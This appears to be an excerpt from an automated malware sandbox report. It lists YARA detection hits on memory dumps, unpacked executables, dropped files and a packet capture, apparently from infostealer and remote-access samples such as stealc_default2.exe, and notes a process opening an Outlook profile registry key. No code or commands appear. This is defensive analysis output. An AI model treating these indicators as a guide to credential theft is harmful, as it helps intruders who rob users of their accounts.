Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Source: Yara match File source: 00000017.00000002.3070584798.0000000001081000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.3070584798.000000000101E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.3014501020.0000000003257000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.3201717209.0000000002D2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.3201717209.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: VCIo8iTrPf.exe PID: 5984, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: stealc_default2.exe PID: 3488, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost015.exe PID: 5268, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 4816, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000018.00000002.3021996080.0000000003129000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: stealc_default2.exe PID: 3488, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost015.exe PID: 5268, type: MEMORYSTR
Source: Yara match File source: 25.0.penis.exe.ac0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000019.00000000.2952756193.0000000000AC2000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\penis[1].exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.0.newbundle2.exe.30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.crypted.exe.38a5570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.RegAsm.exe.436080.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.gold.exe.4165570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.RegAsm.exe.436080.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.VCIo8iTrPf.exe.ff0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.gold.exe.4165570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000000.2808170295.0000000000FF2000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.3039915900.0000000000051000.00000002.00000001.01000000.0000001D.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.3027013594.00000000038C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2809221317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3514615123.0000000000421000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.3187193053.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2764953143.0000000004165000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: gold.exe PID: 4892, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 2720, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 6696, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: VCIo8iTrPf.exe PID: 5984, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: penis.exe PID: 6200, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: crypted.exe PID: 3792, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 4816, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\VCIo8iTrPf.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\newbundle2[1].exe, type: DROPPED
Source: Yara match File source: 24.2.needmoney.exe.3710000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.needmoney.exe.3740000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.stealc_default2.exe.930000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.needmoney.exe.3710000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.needmoney.exe.3740000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.needmoney.exe.30fa4b9.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.needmoney.exe.30fa4b9.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.0.stealc_default2.exe.930000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000029.00000003.3171679360.0000000005390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.3070584798.000000000101E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.3031467583.0000000003740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000000.2849048856.0000000000931000.00000080.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.3376541999.0000000000BFE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.3065909202.0000000000931000.00000080.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.3030940765.0000000003710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.3021996080.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: stealc_default2.exe PID: 3488, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost015.exe PID: 5268, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\stealc_default2[1].exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: stealc_default2.exe PID: 3488, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost015.exe PID: 5268, type: MEMORYSTR
Source: Yara match File source: 38.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.2.rstxdhuj.exe.38efdb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.2.rstxdhuj.exe.38a1590.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000002.3231251960.00000000038A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.3116851630.0000000002971000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.3514611255.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 25.0.penis.exe.ac0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\penis[1].exe, type: DROPPED